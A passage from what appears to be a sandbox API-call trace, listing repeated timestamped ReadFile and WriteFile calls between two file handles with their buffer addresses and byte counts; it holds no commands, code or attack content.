lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.952] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.953] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.953] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.954] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.954] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.955] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.955] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.956] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.956] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.957] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.957] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.960] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.961] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.961] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.962] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.962] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.963] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.963] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.964] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.964] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.965] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.965] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.966] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.966] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.967] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.967] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.968] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.968] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.969] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.969] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.970] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.970] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.970] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.971] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.971] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.972] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x265, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.972] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.973] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.974] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.974] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.975] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.975] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.976] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.977] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.977] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.978] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.978] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.979] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.979] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.980] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.981] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.981] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.982] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.982] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.983] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.983] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.984] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.984] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.985] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.985] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.986] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.986] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.987] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.987] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.987] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x393, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.988] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.988] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.996] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.996] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x367, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.997] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.997] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.998] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.998] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.999] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0021.999] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.999] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.000] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.000] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.001] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.001] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.002] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.002] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.003] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.003] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.003] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.004] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.004] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.006] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.006] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.007] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x399, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.007] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0022.008] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.008] ReadFile (in: 